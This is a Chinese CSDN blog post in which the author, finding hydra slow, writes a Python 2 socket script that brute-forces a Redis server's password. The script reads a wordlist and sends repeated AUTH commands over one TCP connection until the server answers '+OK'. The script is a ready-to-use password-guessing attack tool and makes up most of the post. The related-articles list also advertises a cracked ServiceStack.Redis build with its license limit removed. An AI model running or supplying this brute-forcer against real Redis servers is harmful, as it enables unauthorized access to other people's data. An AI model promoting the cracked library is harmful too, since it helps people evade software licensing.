redis密码破解(python使用socket模块)

最新推荐文章于 2023-11-27 13:57:37 发布
最新推荐文章于 2023-11-27 13:57:37 发布
阅读量1.5k 收藏
点赞数
分类专栏: Python redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qqhappy8/article/details/85305108
版权

         偶尔看到一篇讲述redis未授权访问漏洞的,提到用hydra进行redis密码的破解。测试了下,发现安装的hydra竟然无法破解出密码,且速度很慢(hydra版本 v8.2-dev)。

    如上图,用一个for循环生成个随机密码测试文件,将正确密码写入。

如上图,hydra竟然没破解出密码,不知道是不是bug,而且一分钟才运行差不多10000次密码猜测。而redis的配置文件里面提到redis能支持每秒150K的密码猜测。

 于是想用Python写个破解脚本。ipython下用socket模块测试了下,建立tcp连接后,auth认证成功,服务器会返回+ok,错误密码会返回“ERR,invalid password”:

代码如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 18-9-22 下午11:03
# @Site    : 
# @File    : redisCrack.py
# @Software: PyCharm

import socket
import sys

redisCrackFile="redisPass.txt"   #破解密码文件

ip="192.168.36.3"
port=6379
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,port))      #建立tcp连接
with open(redisCrackFile,"r") as f:
    for i in f:
        s.send("auth %s \n" %(i))    #在一个tcp连接里多次使用auth命令猜测
        authResult=s.recv(1024)
        if '+OK' in authResult:
            print "the redis pass is:%s" %i
            s.close()
            sys.exit(0)

测试如下:

 

运维Enter
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ServiceStack.Redis 4.5.0.0破解版去除次数限制
10-26
ServiceStack.Redis 4.5.0.0 已解除license限制
redis密码破解(python使用redis模块)
Focus on k8s and python
12-28 2017
         昨天用socket模块写了个破解redis密码的脚本,今天用Python redis模块在写了个,同一个密码文本,发现redis模块速度明显不如socket模块,代码如下: #!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 18-12-27 下午9:20 # @Site : # @File : ...
【转载】使用python来操作redis用法详解
Zx13170918986的博客
04-17 5376
转载用于收藏学习,原文地址:https://www.cnblogs.com/interdrp/p/15543309.html 尊重原创 使用python来操作redis用法详解 1、redis连接 redis提供两个类Redis和StrictRedis用于实现Redis的命令,StrictRedis用于实现大部分官方的命令,并使用官方的语法和命令,Redis是StrictRedis的子类,用于向后兼容旧版本的redis-py。 redis连接实例是线程安全的,可以直接将redis连接实例设置为一个全局变量,
Redis未授权访问漏洞复现与利用
qq_42430287的博客
04-24 1561
Redis未授权访问漏洞复现与利用
python多线程socket服务端_Redis总结(八)redis单线程还是多线程问题
weixin_39534978的博客
11-26 153
redis为什么可以支持高并发和它内部的工作模式有不可分割的关系: - 绝大部分请求是纯粹的内存操作(非常快速) - 采用单线程,避免了不必要的上下文切换和竞争条件 - 非阻塞IO - IO多路复用Redis客户端对服务端的每次调用都经历了发送命令,执行命令,返回结果三个过程。其中执行命令阶段,由于Redis是单线程来处理命令的,所有到达服务端的命令都不会立刻执行,所有的命令都会进入一个队列中,然...
RedisPython客户端redis-py安装使用说明文档
09-10
RedisPython客户端`redis-py`是一个用于与Redis数据库交互的Python库,它提供了丰富的功能,使得在Python中操作Redis变得简单易行。本篇文档将详细介绍`redis-py`的安装、基本使用、API参考及一些详细说明。 1. *...
async_pubsub:使用 Redis、ZMQ、Tornado 在 Python 中异步发布订阅
06-17
要实现异步发布订阅,我们需要使用`redis-py`的`pubsub`模块,创建一个`PubSub`对象,并分别在发布者和订阅者中监听和发送消息。 ```python import redis # 创建Redis连接 r = redis.Redis(host='localhost', port...
游戏服务器 C socket模块server_socket.zip
最新发布
04-14
这个C#实现的小游戏是一个简单的猜数字游戏,让玩家...Java、Python、Node.js、Spring Boot、Django、Express、MySQL、PostgreSQL、MongoDB、React、Angular、Vue、Bootstrap、Material-UI、Redis、Docker、Kubernetes
Python开发简历技能点模板
08-04
2. 熟悉 Python 语法、数据类型、控制结构、函数、模块等基础概念 3. 了解设计模式,包括工厂模式、装饰模式、单体模式等 Web 开发 1. 熟悉 Python Web 技术,包括 Django、Flask、Tornado 等框架 2. 了解 Django ...
基于python的安全即时通讯系统-源码
10-02
实现即时通讯系统的核心是网络编程,Pythonsocket模块提供了基础的网络通信接口。开发者利用TCP/IP协议建立稳定的连接,实现客户端与服务器之间的双向通信。 3. **加密与安全** 在安全即时通讯系统中,数据的...
血的教训------入侵redis之利用python破解redis密码
guijianchouxyz的博客
11-27 518
利用强大的python来进行redis密码破解,过程不亦乐乎,当然也可以用shell脚本,不停的循环密码来撞库也可以实现其他相关联的文章这里使用的是kail系统,主要原因有两点,1、可以吸引下大家,2、上面直接就有python,不用自己安装,当然了,咱这用的是python2也可以,普通的linux服务器上面也有,所以主要的原因就是第一点吧,哈哈哈哈。
python redis密码登录_python 操作redis
weixin_39827034的博客
01-11 3630
Redis是一个基于内存的键值对存储系统,常用作数据库、缓存和消息代理。它支持字符串、字典、列表、集合、有序集合、位图、地理位置、HyperLogLog等多种数据结构,所以常常被称作为数据结构服务器。Redis支持事务、切片、主从复制,支持RDB(将内存中的数据保存在文件中)和AOF(类似于MySQL的binlog)两种持久化方式,还支持订阅分发、Lua脚本、集群(Redis3.0加入的功能)等特...
Redis学习0 -介绍及安装
隔壁小红馆
11-10 2252
Redis - 介绍 Redis是一个key-value存储系统(数据库)。redis支持存储的value类型有很多种,如string(字符串)、list(链表)、set(集合)、zset(有序集合)和hash(哈希类型)。 安装redis库 因为我是用ubuntu安装学习的 ubuntu 安装redis python连接redis python连接redis分两种情况(一种是有密码,一种是无密码 因为redis安装的时候,默认是无密码的 1. 有密码: import redis r = redis
redis设置密码
技术分享博客
11-04 377
redis设置密码 1.打开redis配置文件 2.修改 requirepass(注意前面不要留空格) 3.重启Redis 至此设置密码就成功了
pythonredis 连接中密码出现特殊字符
lishijin5421的博客
12-31 2417
解决python redis连接中常见问题。
python redis密码登录_Python安装并操作redis实现流程详解
weixin_39933508的博客
12-18 1194
Redisredis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方...
python redis使用教程
重剑无锋博客
05-09 165
python连接redis时设置了密码,但是redis默认是没有密码的,所以需要设置一下密码
Python操作Redis从入门到精通附代码(全)
码农研究僧的博客
06-26 1645
对于Redis的相应原理以及知识点对应的java版本,可看我之前的文章:(其知识点都是互通的) Redis框架从入门到学精(全)对于以上的前置知识如果了解了更好,如果不了解,就当是一种数据库,上手也很快。 本身Redis就是一种可持久的Key-Value的数据库,有丰富的数据结构等通过进行安装导入redis模块包即可 如果在安装以及使用的过程中遇到这些bug 可看我之前的文章:本身就是一种数据库,操作数据库第一就是连接Redis,本身有两个类可以连接,官方提供了Redis(StrictRedis的子类)以
Python3之redis使用
weixin_30872671的博客
07-23 546
简介   redis是一个key-value存储系统,和Memcache类似,它支持存储的value类型相对更多,包括string(字符串),list(列表),set(集合),zset(有序集合),hash(哈希类型)。这些数据类型都支持push/pop,add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序,与memcach...
pythonredis用哨兵模式读取redis
02-08
Python使用Redis的哨兵模式读取Redis值,可以通过以下步骤实现: 1. 首先,确保已经安装了Redisredis-py库。可以使用以下命令安装redis-py库: ``` pip install redis ``` 2. 导入redis模块: ```python...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值